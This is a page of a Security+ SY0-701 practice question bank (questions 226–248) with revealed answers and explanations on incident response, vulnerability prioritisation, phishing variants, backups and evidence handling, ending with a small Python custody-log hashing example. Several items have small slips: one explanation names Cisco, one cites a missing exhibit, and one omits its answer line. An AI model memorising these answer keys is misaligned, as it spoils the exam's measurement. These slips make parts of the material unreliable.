Security+ SY0-701 (SY0-701) — Questions 226–300

1152 questions total · 16 pages · All types, answers revealed

Page 4 of 16
226
MCQ · medium

A team moved a Linux VM to IaaS. They need OS login events, process activity, and network flow metadata sent to one central platform for alerting. What is the best first step?

A. Enable only perimeter security groups and assume the cloud provider will collect all host telemetry.
B. Deploy an endpoint logging agent and enable cloud-native flow logs to a centralized logging service.
C. Store the VM snapshots in object storage and review them manually during incidents.
D. Rely on the hypervisor console and disable guest-level logging to reduce overhead.
Answer: B

This gives visibility into both host activity and network metadata, which is needed for practical monitoring and investigation.

Why this answer

Option B is correct because deploying an endpoint logging agent (e.g., auditd, osquery, or a SIEM agent) on the Linux VM captures OS login events and process activity at the guest level, while enabling cloud-native flow logs (e.g., AWS VPC Flow Logs, Azure NSG flow logs) provides network flow metadata. Sending both to a centralized logging service (e.g., AWS CloudWatch Logs, Azure Log Analytics, or a third-party SIEM) ensures all required telemetry is aggregated for alerting. This approach directly addresses the need for host-level and network-level visibility without relying on the cloud provider to collect guest OS internals.

Exam trap

The trap here is that candidates may assume cloud providers automatically collect guest OS telemetry (like login events and process activity) when they only provide infrastructure-level logs (e.g., hypervisor or network flow logs), leading them to choose Option A or D incorrectly.

How to eliminate wrong answers

Option A is wrong because perimeter security groups only filter network traffic at the cloud boundary and do not collect OS login events, process activity, or network flow metadata; the cloud provider does not automatically collect host-level telemetry from guest VMs. Option C is wrong because storing VM snapshots in object storage is a backup/recovery method, not a real-time logging solution, and manual review during incidents is too slow and impractical for continuous alerting. Option D is wrong because relying solely on the hypervisor console provides only hypervisor-level logs (e.g., VM start/stop), not guest OS login events or process activity, and disabling guest-level logging removes the very data needed for security monitoring.

227
Multi-Select · medium

A weekly vulnerability scan returns five findings across different systems. Which three should be remediated first? Select three.

Select 3 answers
A. A critical remote-code-execution flaw on an internet-facing VPN appliance with active exploitation reported.
B. A medium-severity missing patch on an offline lab VM with no network connectivity.
C. Default administrator credentials on an internet-facing management portal.
D. A high-severity remote-code-execution vulnerability on a public customer portal that stores account records.
E. A low-severity TLS configuration warning on a public site that does not handle sensitive information.
Answers: A, C, D

Correct because the issue is both highly exploitable and externally exposed. Active exploitation and internet reachability make this the highest-priority risk in the list.

Why this answer

Option A is correct because a critical remote-code-execution (RCE) vulnerability on an internet-facing VPN appliance with active exploitation reported represents the highest risk: it is exposed to the internet, allows full system compromise, and is actively being exploited in the wild, making immediate remediation essential to prevent a breach.

Exam trap

The trap here is that candidates might prioritize based solely on CVSS severity without considering the system's exposure, active exploitation status, or the presence of default credentials, leading them to incorrectly select a low-risk offline system or a low-severity warning over the truly critical findings.

228
MCQ · hard

A company runs payroll and HR application servers on the same VLAN because a redesign is not possible this quarter. Security wants to reduce lateral movement if one workload is compromised, but the team cannot renumber the environment or add new physical firewalls. Which control best fits the requirement?

A. Move the servers into a single larger subnet so internal routing is simplified
B. Implement microsegmentation with host-based or distributed firewall rules between workloads
C. Place the servers behind a network address translation device to hide their IP addresses
D. Rely on password rotation and MFA for administrative logins only
Answer: B

Microsegmentation is the best fit when the organization cannot redesign the network but still needs to isolate workloads more tightly. Host-based or distributed firewall rules can restrict east-west traffic between individual servers, even when they share the same VLAN. That reduces lateral movement far better than coarse VLAN-only separation and does not require renumbering the environment.

Why this answer

Microsegmentation using host-based or distributed firewall rules (e.g., via a hypervisor firewall or host firewall policies) allows the security team to enforce zero-trust east-west traffic controls between the payroll and HR servers without changing the VLAN, subnet, or adding physical firewalls. This directly reduces lateral movement by restricting communication to only what is necessary, even though both workloads share the same Layer 2 broadcast domain.

Exam trap

The trap here is that candidates often assume VLAN segmentation is the only way to isolate workloads, but the question explicitly prevents renumbering or adding firewalls, so the correct answer leverages host-based or distributed firewall rules to achieve microsegmentation without changing the network topology.

How to eliminate wrong answers

Option A is wrong because moving servers into a single larger subnet simplifies routing but does nothing to restrict lateral movement between workloads; in fact, it may increase the attack surface by placing more hosts in the same broadcast domain. Option C is wrong because placing servers behind a NAT device hides their IP addresses from external networks but does not restrict traffic between the two servers on the same VLAN; NAT operates at Layer 3/4 and does not enforce host-to-host segmentation within the same subnet. Option D is wrong because password rotation and MFA protect administrative logins but do not prevent a compromised workload from moving laterally to another server; they address authentication, not network-level or host-level traffic filtering.

229
MCQ · medium

A SIEM correlates VPN authentication logs and sees 14 different user accounts receive one failed login attempt each from the same source IP during a 5-minute window. A few minutes later, one of those accounts successfully authenticates from that same IP. Which attack is most likely?

A. Brute-force attack against a single account using many passwords.
B. Password spraying using a common password against many accounts.
C. Replay attack using previously captured authentication traffic.
D. ARP poisoning used to intercept local network traffic.
Answer: B

This pattern matches a low-and-slow attempt across multiple accounts to avoid lockouts, with one account eventually succeeding.

Why this answer

The SIEM observed 14 different user accounts each receiving a single failed login attempt from the same source IP within a 5-minute window, followed by one account successfully authenticating. This pattern is characteristic of password spraying, where an attacker tries a common password (e.g., 'Password123') against many accounts to avoid triggering account lockouts, then leverages a successful guess. The single failure per account avoids the threshold for brute-force detection, and the eventual success confirms a guessed credential.

Exam trap

The trap here is that candidates confuse password spraying with brute-force attacks, failing to recognize that the key differentiator is the number of accounts targeted versus the number of passwords attempted per account.

How to eliminate wrong answers

Option A is wrong because a brute-force attack targets a single account with many password attempts, not multiple accounts with one attempt each. Option C is wrong because a replay attack requires capturing and retransmitting valid authentication traffic (e.g., a Kerberos TGT or NTLM hash), which would not produce failed login attempts from the same IP. Option D is wrong because ARP poisoning is a Layer 2 attack used to intercept local traffic on a switched network, not to generate VPN authentication logs with failed and successful logins from a single source IP.

230
Multi-Select · medium

A Windows server is still running after suspected compromise. Before it is powered down, which two volatile data sources should be collected first? Select two.

Select 2 answers
A. A memory capture or RAM image from the live system.
B. A snapshot of active network connections and listening ports.
C. A full disk image from the powered-off server.
D. A hardware inventory report from the asset management database.
E. A screenshot of the server’s desktop wallpaper for reference.
Answers: A, B

A memory capture is one of the most important volatile data sources because it can reveal running malware, injected code, encryption keys, live network sessions, and command history not stored on disk. Once the system is powered off, this information is lost. Capturing RAM early gives investigators the best chance to reconstruct the attacker’s activity.

Why this answer

A memory capture (RAM image) preserves volatile data that is lost on power-down, including running processes, open network connections, encryption keys, and malware that exists only in memory. This is critical for forensic analysis of a live system suspected of compromise, as it captures the system state at the time of collection.

Exam trap

The trap here is that candidates often confuse the order of volatility and select a disk image (Option C) as a first step, not realizing that volatile data like RAM and network connections must be collected before powering down the system.

231
Multi-Select · hard

A support portal lets users upload files and name them manually. During review, a tester submits a filename containing path traversal sequences, and logs later show the application trying to access files outside the intended upload folder. Which two changes best address the flaw? Select two.

Select 2 answers
A. Validate and canonicalize the filename on the server, then allow only approved name patterns.
B. Store uploads outside the web root and deny execution permissions on the upload directory.
C. Increase the maximum upload size so the application can handle more files.
D. Add browser-side JavaScript validation to reject suspicious filenames.
E. Hide detailed error messages from end users only.
Answers: A, B

Server-side canonicalization and allowlisting stop attackers from escaping the expected directory structure. Client-side checks are not enough because attackers can modify requests directly. This is the most direct way to prevent traversal sequences from being interpreted as filesystem paths.

Why this answer

Option A is correct because server-side validation and canonicalization (e.g., using `realpath()` or `Path.GetFullPath()`) resolves path traversal sequences like `../` to an absolute path, which can then be checked against an allowlist of permitted patterns. This prevents the application from following malicious sequences to access files outside the intended upload directory. Without canonicalization, simple string filtering can be bypassed by encoding or alternative traversal patterns.

Exam trap

CompTIA often tests the misconception that client-side validation or error message hiding is sufficient to prevent server-side attacks, when in fact only server-side canonicalization and allowlisting can stop path traversal.

232
MCQ · easy

A small company has two security issues and can fix only one this week. Which should be prioritized first? One issue is an internal lab server with a medium-severity flaw. The other is an internet-facing login portal using default administrator credentials.

A. Fix the internal lab server first because every vulnerability should be treated equally.
B. Fix the internet-facing login portal first because default administrator credentials create a much higher risk.
C. Wait until the monthly maintenance window so both issues can be fixed at the same time.
D. Ignore both issues until users report symptoms, then respond if something happens.
Answer: B

This is the best choice because a public-facing system with default credentials is far more likely to be attacked and can lead to immediate compromise. Risk prioritization considers both likelihood and impact, not just severity labels. Exposed administrative access can quickly become a business-wide incident, so it should be addressed first.

Why this answer

The internet-facing login portal using default administrator credentials represents an immediate, high-impact risk because it allows unauthorized remote access with administrative privileges. Default credentials are well-known and actively targeted by automated scanners and attackers, making exploitation trivial. In contrast, the internal lab server with a medium-severity flaw is behind network segmentation and requires additional access, so its risk is lower and can be deferred.

Exam trap

Cisco often tests the principle of prioritizing vulnerabilities based on risk (likelihood and impact) rather than treating all vulnerabilities equally, and the trap here is assuming that severity alone (medium vs. high) determines priority without considering exposure and exploitability.

How to eliminate wrong answers

Option A is wrong because it incorrectly assumes all vulnerabilities should be treated equally, ignoring the critical factor of exploitability and exposure; a medium-severity flaw on an internal server is far less urgent than default admin credentials on an internet-facing portal. Option C is wrong because delaying both fixes until a monthly maintenance window leaves a critical authentication bypass vulnerability exposed for an extended period, which is unacceptable when immediate remediation is possible.

233
Multi-Select · medium

An organization wants to reduce the risk of malware infections from removable media. Which three of the following controls should be implemented? (Choose three.)

Select 3 answers
A. Disabling AutoRun and AutoPlay features
B. Enforcing a policy of full disk encryption on all removable drives
C. Using group policy to block execution from removable media
D. Scanning all removable media with antivirus software upon insertion
E. Requiring all removable media to be formatted as NTFS
F. Installing a host-based intrusion detection system on every workstation

Why this answer

Disabling AutoRun and AutoPlay features prevents malicious code from executing automatically when removable media is inserted, which is a common infection vector. Using group policy to block execution from removable media stops any executable files from running, even if manually launched. Scanning all removable media with antivirus software upon insertion detects and quarantines known malware before it can interact with the system.

Exam trap

The trap here is that candidates often confuse data protection controls (like encryption) with execution prevention controls, or they assume that file system formatting (NTFS) provides security against malware execution.

234
MCQ · medium

A security analyst receives multiple alerts indicating that several users in the finance department clicked a malicious link in an email. The analyst has confirmed the email subject line and sender address. Which of the following is the BEST first step to contain the incident?

A. Block the sender's email address at the email gateway.
B. Disable the users' accounts.
C. Perform a forensic analysis of the emails.
D. Delete the emails from the users' mailboxes.
Answer: A

This is correct because blocking the sender at the email gateway prevents any further malicious emails from that source from reaching users, effectively containing the threat at its entry point.

Why this answer

Blocking the sender's email address at the email gateway is the best first step because it immediately prevents further malicious emails from that sender from reaching any users, containing the incident at the perimeter. This action stops the spread of the attack without disrupting user productivity or requiring time-consuming analysis, aligning with the priority of containment in incident response.

Exam trap

The trap here is that candidates confuse containment with eradication or investigation, choosing to delete emails (Option D) or analyze them (Option C) first, when the immediate priority is to stop the attack vector at the gateway to prevent further compromise.

How to eliminate wrong answers

Option B is wrong because disabling users' accounts is an overly aggressive containment step that disrupts legitimate work and is typically reserved for compromised accounts or active credential misuse, not for users who merely clicked a link. Option C is wrong because performing forensic analysis of the emails is a post-containment investigation step; it delays immediate containment and should be done after blocking the threat. Option D is wrong because deleting emails from users' mailboxes only removes the current messages but does not prevent the sender from sending new malicious emails, leaving the organization vulnerable to further attacks.

235
Multi-Select · hard

A payment application must keep running if one application server fails, and the business can tolerate no more than 5 minutes of lost transactions and 30 minutes of downtime during a site outage. Which two controls best match the availability requirements? Select two.

Select 2 answers
A. Deploy at least two active application nodes behind a load balancer so one server failure does not interrupt service.
B. Use a cold site that is powered off until a disaster is declared.
C. Configure near-real-time database replication or synchronous replication to a standby so recent transactions are preserved.
D. Take nightly backups to meet the 5-minute recovery point objective.
E. Rely on weekly VM snapshots because they are faster than replication.
Answers: A, C

A load balancer with multiple active nodes removes the single-server dependency and lets traffic continue if one node fails or is taken down for maintenance. This directly addresses the requirement to survive an application server failure without stopping the service. It is a standard high-availability design for front-end and application tiers.

Why this answer

Option A is correct because deploying at least two active application nodes behind a load balancer ensures that if one server fails, traffic is automatically redirected to the remaining healthy node(s), achieving zero downtime for the application itself. This directly meets the requirement that the payment application must keep running if one application server fails, without any interruption to service.

Exam trap

The trap here is that candidates often confuse recovery point objective (RPO) with recovery time objective (RTO), mistakenly choosing nightly backups (Option D) or weekly snapshots (Option E) because they think any backup meets the RPO, but the 5-minute RPO requires near-continuous data protection, not periodic backups.

236
MCQ · easy

Several employees receive a text message that says their payroll deposit failed and they must tap a link to verify account details. The link opens a fake login page. What type of attack is this?

A. Phishing
B. Smishing
C. Pretexting
D. Baiting
Answer: B

Smishing is phishing delivered through SMS or other text messaging services.

Why this answer

Smishing is a form of phishing that uses SMS (Short Message Service) text messages as the attack vector. In this scenario, the attacker sends a fraudulent text message claiming a payroll deposit failure and includes a link to a fake login page, which is the classic mechanism of smishing. The attack relies on social engineering via SMS to trick the recipient into revealing sensitive credentials.

Exam trap

The trap here is that candidates often confuse 'smishing' with general 'phishing' because they do not differentiate the delivery vector (SMS vs. email), but the SY0-701 exam expects you to identify the specific attack type based on the communication channel used.

How to eliminate wrong answers

Option A is wrong because phishing is a broad category of social engineering attacks typically carried out via email, not specifically via SMS text messages; while smishing is a subset of phishing, the question explicitly describes an SMS-based attack, making 'smishing' the more precise term. Option C is wrong because pretexting involves fabricating a scenario (pretext) to obtain information, often through impersonation or a false backstory, but it does not necessarily involve a direct link to a fake login page or the use of SMS as the delivery mechanism. Option D is wrong because baiting relies on offering something enticing (e.g., a free download or USB drive) to lure the victim into a trap, whereas this attack uses a false sense of urgency (payroll failure) and a link to a fake login page, which is characteristic of smishing, not baiting.

237
MCQ · medium

An HR manager wants to share employee data with a benefits analytics vendor. The dataset includes names, employee IDs, home addresses, and medical leave codes. Security wants to reduce privacy exposure while still allowing the vendor to complete the analysis. What is the best first step?

A. Send the full file as-is if the vendor agrees not to disclose it
B. Provide only the minimum necessary fields and replace direct identifiers with project IDs
C. Keep the names but mark the spreadsheet confidential before sending it
D. Upload the file to a public cloud folder and restrict the link to the vendor
Answer: B

Minimizing fields and pseudonymizing direct identifiers reduces privacy exposure while still supporting the business purpose.

Why this answer

Option B is correct because it implements data minimization, a core privacy principle, by providing only the minimum necessary fields and replacing direct identifiers (names, employee IDs) with project-specific pseudonyms. This reduces exposure of personally identifiable information (PII) while preserving the vendor's ability to perform analytics on the medical leave codes and other non-identifying data. It aligns with the CompTIA SY0-701 objective of applying privacy-enhancing techniques like anonymization and data masking.

Exam trap

The trap here is that candidates often assume a legal agreement (Option A) or confidentiality marking (Option C) is sufficient for data protection, but CompTIA emphasizes that technical controls like data minimization and pseudonymization are the first and most effective steps to reduce privacy exposure.

How to eliminate wrong answers

Option A is wrong because sending the full file as-is, even with a non-disclosure agreement, still exposes all PII (names, addresses, medical codes) to the vendor, violating the principle of least privilege and increasing breach risk. Option C is wrong because marking a spreadsheet as confidential does not technically protect the data; it relies on trust rather than technical controls like access restrictions or data masking, and the file remains fully readable. Option D is wrong because uploading to a public cloud folder with a restricted link still exposes the full dataset to anyone who obtains the link, and cloud storage does not inherently apply data minimization or pseudonymization.

238
Matching · medium

Match each procurement need to the vendor due diligence artifact or control that best fits.

1. Procurement wants independent evidence that a SaaS provider's controls operated effectively during the last year.
2. The team wants to know what files, libraries, and modules were included in a supplier's software build.
3. The business needs a signed agreement that defines how customer data is handled and what the vendor must do if an incident occurs.
4. The procurement team wants answers about MFA, logging, and incident response before onboarding a cloud supplier.

Concepts

SOC 2 Type II report

Software bill of materials (SBOM)

Data processing agreement (DPA)

Security questionnaire

Why these pairings

Each artifact or control directly addresses the procurement need: SOC 2 Type II provides independent audit evidence; SBOM lists software components; DPA is the legal agreement for data handling; security questionnaires gather specific security practices; pen test reports validate controls; BCP ensures continuity.

239
MCQ · medium

Based on the exhibit, which change best reduces the risk of lateral movement if a user workstation is compromised?

A. Add more workstations to VLAN 10 so authentication requests are faster.
B. Require administrative access through a hardened bastion host and restrict direct management from user devices.
C. Disable logging on the servers so attackers leave fewer traces if they connect.
D. Move all servers into the same VLAN as the workstations for easier access control.
Answer: B

A bastion host creates a controlled management path instead of allowing every workstation to talk directly to servers. Restricting direct SSH and RDP from the user VLAN reduces attack surface and supports a zero-trust-style approach to administration.

Why this answer

Requiring administrative access through a hardened bastion host enforces a jump-box architecture, which eliminates direct RDP, SSH, or WinRM from user workstations to servers. This segmentation prevents an attacker who compromises a user workstation from using stolen credentials or tools to laterally move to sensitive servers, as all management traffic must pass through a controlled, monitored, and often multi-factor-authenticated bastion host.

Exam trap

CompTIA often tests the misconception that adding more resources to a VLAN or disabling logging improves security, when in fact these actions weaken segmentation and reduce visibility, respectively.

How to eliminate wrong answers

Option A is wrong because adding more workstations to VLAN 10 does not reduce lateral movement risk; it increases the attack surface and does not address the need for network segmentation or access control between user devices and servers. Option C is wrong because disabling logging on servers removes the audit trail that is critical for detecting and investigating lateral movement, directly violating security best practices and compliance requirements. Option D is wrong because moving all servers into the same VLAN as workstations collapses the security boundary, allowing any compromised workstation to directly reach servers without any network-level controls, thereby increasing lateral movement risk.

240
MCQ · easy

A finance manager gets a phone call from someone claiming to be the CEO's assistant, urgently requesting a wire transfer before a board meeting. What type of attack is this?

A. Smishing
B. Vishing
C. Spear phishing
D. Watering-hole attack
Answer: B

This is a phone-based social engineering attempt that uses urgency and impersonation.

Why this answer

B is correct because vishing (voice phishing) uses a phone call to socially engineer the victim into performing a sensitive action, such as a wire transfer. The attacker impersonates a trusted authority (the CEO's assistant) and exploits urgency to bypass normal verification procedures. This is distinct from text-based phishing (smishing) or targeted email attacks (spear phishing).

Exam trap

The trap here is that candidates confuse the delivery method (phone call) with the attack type, often choosing 'spear phishing' because the target is a specific individual, but the defining characteristic is the voice channel, not the targeting precision.

How to eliminate wrong answers

Option A is wrong because smishing relies on SMS/text messages, not voice calls, to deliver the phishing lure. Option C is wrong because spear phishing is a targeted email attack that uses personalized content, not a real-time phone conversation. Option D is wrong because a watering-hole attack compromises a legitimate website frequented by the target group to deliver malware, not a direct social engineering call.

241
MCQ · medium

A vulnerability scan produces these results:

- Finding 1: High severity, internet-facing VPN appliance, known exploit available, no compensating controls
- Finding 2: Critical severity, internal development workstation, requires authenticated local access
- Finding 3: Medium severity, test server, no public exploit and not reachable from outside

Which finding should be remediated first?

A. Finding 1
B. Finding 2
C. Finding 3
D. All findings are equal because the severity rating alone determines priority
Answer: A

An internet-facing VPN with known exploit code and no compensating controls presents the highest practical risk because it is exposed and readily exploitable.

Why this answer

Finding 1 should be remediated first because it combines high severity with an internet-facing attack surface and a known exploit, meaning an attacker can remotely compromise the VPN appliance without authentication or compensating controls. This creates an immediate and direct risk of network breach, unlike the other findings which require local access or are isolated from external threats.

Exam trap

The trap here is that candidates prioritize by severity alone (Critical > High) without considering the attack vector, exploitability, and network exposure, which are key to risk-based prioritization in the SY0-701 exam.

How to eliminate wrong answers

Option B is wrong because although the severity is critical, the vulnerability requires authenticated local access, meaning an attacker must already have a foothold inside the network, making it less urgent than an internet-facing exploit. Option C is wrong because medium severity on a test server with no public exploit and no external reachability poses minimal immediate risk, as exploitation requires both access and a custom attack. Option D is wrong because severity rating alone does not determine priority; factors like exposure, exploit availability, and compensating controls must be considered in risk-based remediation.

242
MCQ · medium

During a restore test, a technician brings back a file server successfully, but the application team discovers that the database is missing the last 12 hours of transactions. Management says the business can tolerate only one hour of data loss. What should be changed first?

A. Reduce the restore point objective by storing more copies of the same backup.
B. Implement application-consistent backups or transaction log backups more frequently.
C. Extend the retention period so the full backup is kept for 90 days.
D. Shorten the recovery time objective by using faster storage for the server.
Answer: B

A one-hour data-loss target requires more frequent capture of changed database state. Application-consistent backups or transaction log backups reduce the gap between backups and allow recovery closer to the required recovery point objective.

Why this answer

The core issue is that the database is missing 12 hours of transactions, which exceeds the business's tolerance of one hour of data loss. This indicates that the Recovery Point Objective (RPO) is not being met. Implementing application-consistent backups or more frequent transaction log backups ensures that the database state can be recovered to a point within the acceptable loss window, directly addressing the RPO gap.

Exam trap

The trap here is confusing Recovery Point Objective (RPO) with Recovery Time Objective (RTO), leading candidates to select options that improve restore speed (RTO) or backup retention rather than addressing the frequency of backups needed to limit data loss.

How to eliminate wrong answers

Option A is wrong because storing more copies of the same backup does not change how often backups are taken; it adds redundancy against losing a copy but leaves the most recent recoverable state exactly where it was, so the Recovery Point Objective (RPO) is not improved. (The option's phrase "restore point objective" is not a standard term; the objective the scenario fails to meet is the Recovery Point Objective.) Option C is wrong because extending the retention period (e.g., keeping full backups for 90 days) addresses how long backups are kept, not how recent the recoverable data is, so it does not solve the RPO issue. Option D is wrong because shortening the Recovery Time Objective (RTO) by using faster storage focuses on how quickly the server can be restored, not on minimizing data loss, which is an RPO concern.

243
Multi-Selecthard

A security team receives a macro-enabled spreadsheet from a supplier. The file must be analyzed before any user opens it, and if the same payload later executes on an endpoint the organization wants the ability to contain it automatically. Which two tools best fit those requirements? Select two.

Select 2 answers
A.Use a sandbox to detonate the attachment in an isolated environment before delivery.
B.Use EDR so the endpoint can be quarantined or isolated if the payload executes.
C.Deploy a WAF in front of the mail gateway.
D.Create a DNS sinkhole entry only after the file is opened by a user.
E.Use DLP to stop the spreadsheet from containing macros.
AnswersA, B

Sandboxing lets analysts observe real behavior safely before the file reaches a user workstation.

Why this answer

Option A is correct because a sandbox detonates the macro-enabled spreadsheet in an isolated environment before delivery, allowing the security team to observe malicious behavior (e.g., payload extraction, child processes, network calls) without risk to production systems. This pre-delivery analysis meets the first requirement: the file is examined before any user opens it. Option B is correct because EDR continuously records process, file, and network activity on the endpoint and lets the SOC isolate or quarantine the host with a single action if the same payload is later executed, which meets the second requirement for automatic containment. The two tools are complementary: the sandbox covers pre-delivery analysis and EDR covers post-execution response, and neither alone satisfies both requirements.

Exam trap

The trap here is that candidates may confuse a WAF (designed for web traffic) with an email security gateway or mistakenly think a DNS sinkhole can analyze file contents, when in fact it only blocks DNS resolution after a domain is flagged.

244
MCQmedium

A threat report says an attacker changes domains daily and rehosts infrastructure in cloud VPS environments, but the phishing email wording, login-page flow, and PowerShell download behavior remain the same. What type of information is most useful for a durable detection rule?

A.Only the current malware hash from the latest sample
B.The attacker’s behavioral pattern and technique sequence
C.The names of the victim company’s departments
D.A screenshot of the phishing email subject line only
AnswerB

Technique-based indicators are more durable because the attacker can rotate infrastructure without changing core behavior.

Why this answer

Option B is correct because the attacker's behavioral pattern and technique sequence remain consistent even as infrastructure changes. A durable detection rule should focus on the invariant TTPs (Tactics, Techniques, and Procedures) such as the phishing email wording, login-page flow, and PowerShell download behavior. These are behaviors rather than atomic indicators of compromise (IOCs) such as hashes, domains, or IP addresses, and they persist across domain and VPS changes because altering them would force the attacker to rework the campaign itself. This aligns with the MITRE ATT&CK framework and the Pyramid of Pain, both of which emphasize detecting adversary behaviors rather than ephemeral artifacts.

Exam trap

CompTIA often tests the misconception that static IOCs like hashes or subject lines are reliable for detection, when in fact behavioral patterns and technique sequences provide durable detection against rapidly changing infrastructure.

How to eliminate wrong answers

Option A is wrong because malware hashes change with each new sample, making them ephemeral IOCs that cannot provide durable detection when the attacker rehosts infrastructure daily. Option C is wrong because victim company department names are irrelevant to the attacker's technical behavior and do not help detect the phishing or download sequence. Option D is wrong because a screenshot of the phishing email subject line is a static, easily changed artifact that does not capture the invariant login-page flow or PowerShell download behavior.

245
MCQmedium

A help desk ticket confirms that a user entered corporate credentials into a fake sign-in page. Minutes later, the security team finds a new mailbox forwarding rule and evidence that the attacker added backup MFA codes. After disabling the account, what should the team do next to support containment and recovery?

A.Wait for the user to confirm the behavior before taking any further steps.
B.Reimage the user's laptop before reviewing the account activity.
C.Revoke active sessions and reset the compromised credentials.
D.Close the ticket because MFA was enabled and should have prevented access.
AnswerC

After disabling the account, the next step is to cut off any valid sessions and reset the credential set so the attacker cannot continue using stolen access. Because the compromise includes mailbox changes and MFA backup code manipulation, session revocation and credential reset are essential containment and recovery tasks.

Why this answer

Option C is correct because after disabling a compromised account, the immediate next step is to revoke all active sessions and reset the credentials. Disabling the account alone does not always terminate tokens or session cookies that were issued while it was active, so revocation ensures the attacker cannot keep using existing sessions, and the new password invalidates the stolen credential. Because the attacker also added backup MFA codes and a forwarding rule, the team should, immediately after the reset, remove the attacker-registered MFA methods and delete the forwarding rule; otherwise the attacker retains a way to satisfy MFA and a persistence path for mail exfiltration. This aligns with the NIST SP 800-61 incident response containment phase, which prioritizes cutting off active attacker access before deeper investigation.

Exam trap

The trap here is that candidates assume MFA is a silver bullet and overlook that attackers can register their own MFA devices or backup codes, or simply reuse an already-authenticated session, making a credential reset alone insufficient without session revocation and cleanup of the attacker's added authentication methods.

How to eliminate wrong answers

Option A is wrong because waiting for user confirmation delays containment and allows the attacker to continue using the account, potentially exfiltrating data or moving laterally. Option B is wrong because reimaging the user's laptop is premature and unnecessary; the compromise is credential-based, not a local system infection, and reviewing account activity first is critical to understand the scope. Option D is wrong because MFA does not prevent credential theft or session hijacking; the attacker added backup MFA codes, bypassing the protection, and closing the ticket ignores the active threat.

246
MCQmedium

A workstation opens an attachment labeled as an invoice and then begins creating scheduled tasks, disabling security services, and contacting a known malicious IP address. What is the best first containment action?

A.Run a full antivirus scan while leaving the system connected
B.Isolate the workstation from the network using the EDR containment feature
C.Reboot the workstation to clear any active malicious processes
D.Uninstall the email client that delivered the attachment
AnswerB

EDR-based isolation stops command-and-control traffic and limits further spread while preserving the system for investigation.

Why this answer

Option B is correct because the workstation is actively communicating with a known malicious IP address and disabling security services, indicating an active compromise. Isolating the workstation via EDR containment immediately stops the outbound command-and-control traffic and prevents lateral movement, which is the priority first step in incident response before any remediation or analysis.

Exam trap

The trap here is that candidates often choose to run an antivirus scan or reboot first, thinking they can clean the infection, but the exam emphasizes that containment (stopping the spread and C2) is the immediate priority over remediation or removal.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan while the system is still connected to the network does not stop ongoing malicious activity, such as C2 communication or scheduled task creation, and may allow the malware to spread. Option C is wrong because rebooting the workstation may clear active processes but does not remove persistence mechanisms like scheduled tasks, and the malware could re-establish contact with the C2 server upon reboot, while also losing volatile forensic data. Option D is wrong because uninstalling the email client does not address the active compromise already in progress; the malware is already executing and communicating, so removing the delivery vector is irrelevant to immediate containment.

247
MCQmedium

A user's laptop suddenly shows encrypted .docx files, a ransom note, and the EDR console reports mass file renames and shadow copy deletion. The device is still online and connected to the corporate VPN. What is the best immediate action?

A.Reboot the laptop into safe mode and attempt manual malware removal.
B.Quarantine the endpoint from the network through EDR or physical isolation.
C.Restore the affected files from backup before taking any other action.
D.Tell the user to change their password and continue working from the same laptop.
AnswerB

Isolating the system immediately contains the ransomware, limits lateral spread, and preserves the device for later investigation. Because the host is still connected to the VPN, it could continue encrypting mapped drives or reach other systems. Containment comes before eradication or recovery, especially when destructive behavior is still active.

Why this answer

Option B is correct because the immediate priority in a confirmed ransomware incident is to contain the threat by isolating the compromised host from the network. The EDR console showing mass file renames and shadow copy deletion indicates active encryption and lateral movement risk. Quarantining via EDR or physically disconnecting the network cable stops the ransomware from encrypting additional shares or communicating with its C2 server, preserving evidence and preventing further damage.

Exam trap

The trap here is that candidates may choose to restore from backups (Option C) first, not realizing that the infected host must be isolated before any recovery attempt to prevent immediate re-encryption of restored files.

How to eliminate wrong answers

Option A is wrong because rebooting into safe mode and attempting manual malware removal is an eradication step that belongs after containment; it destroys volatile evidence (memory contents, active connections) and leaves the host connected to the network while the attempt is made, so it does nothing to stop encryption of reachable shares. Option C is wrong because restoring files from backup before isolating the endpoint could allow the ransomware to re-encrypt the restored files if the host is still online, and it may also overwrite critical forensic evidence. Option D is wrong because telling the user to change their password and continue working ignores the active encryption and allows the ransomware to spread to network shares and other systems via the VPN connection, violating incident response containment principles.

248
Multi-Selectmedium

A company-owned laptop is being transferred from the incident site to the evidence locker for a theft investigation. Which two actions best support chain of custody during transport? Select two.

Select 2 answers
A.Place the device in a tamper-evident evidence bag or seal
B.Document the device serial number, date, time, collector, and each handoff
C.Leave the device unsealed so legal staff can inspect it quickly
D.Boot the laptop to confirm the user’s files are still present
E.Use a personal note app instead of formal transfer documentation
AnswersA, B

A tamper-evident seal helps prove whether the evidence package was opened or altered.

Why this answer

Option A is correct because placing the device in a tamper-evident evidence bag or seal provides a physical barrier that immediately reveals any unauthorized access during transport. This is a foundational chain-of-custody control that preserves the integrity of the evidence by making tampering detectable, which is critical for admissibility in legal proceedings. Option B is correct because a written record of the serial number, date, time, collector, and every handoff is what chain of custody actually consists of: it documents who had the item, when, and why at every moment, and an unexplained gap in that record can get the evidence excluded. The seal proves the package was not opened; the log proves who was responsible for it.

Exam trap

The trap here is that candidates may think booting the laptop is necessary to verify data presence, but this action actually violates forensic preservation principles by altering the system state and potentially destroying evidence.
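The custody record in Option B is only as good as its resistance to after-the-fact editing. The following is an added example, not part of the question bank, showing one way to make that record tamper-evident in software: each handoff entry is hashed together with the previous entry's hash, so retroactively changing any field breaks the chain at that point. The item identifier, serial number, names, times, and seal number are constructed sample values.

```python
import hashlib
import json
from typing import Optional

GENESIS = "0" * 64  # the chain starts from a fixed, public value


def _entry_hash(entry: dict, prev_hash: str) -> str:
    """SHA-256 over the canonical JSON of one entry plus the previous entry's hash."""
    payload = json.dumps(entry, sort_keys=True, separators=(",", ":")) + prev_hash
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


class CustodyLog:
    """Append-only chain-of-custody record for a single evidence item."""

    def __init__(self, item_id: str, serial: str):
        self.item_id = item_id
        self.serial = serial
        self.entries = []

    def record(self, when: str, action: str, by: str,
               to: Optional[str] = None, seal: Optional[str] = None) -> str:
        """Append one event (collection, handoff, check-in) and return its hash."""
        prev = self.entries[-1]["hash"] if self.entries else GENESIS
        entry = {"item_id": self.item_id, "serial": self.serial, "time": when,
                 "action": action, "by": by, "to": to, "seal": seal}
        entry["hash"] = _entry_hash(entry, prev)
        self.entries.append(entry)
        return entry["hash"]

    def verify(self) -> Optional[int]:
        """Return None if every link checks out, else the index of the first bad entry."""
        prev = GENESIS
        for i, e in enumerate(self.entries):
            body = {k: v for k, v in e.items() if k != "hash"}
            if _entry_hash(body, prev) != e["hash"]:
                return i
            prev = e["hash"]
        return None


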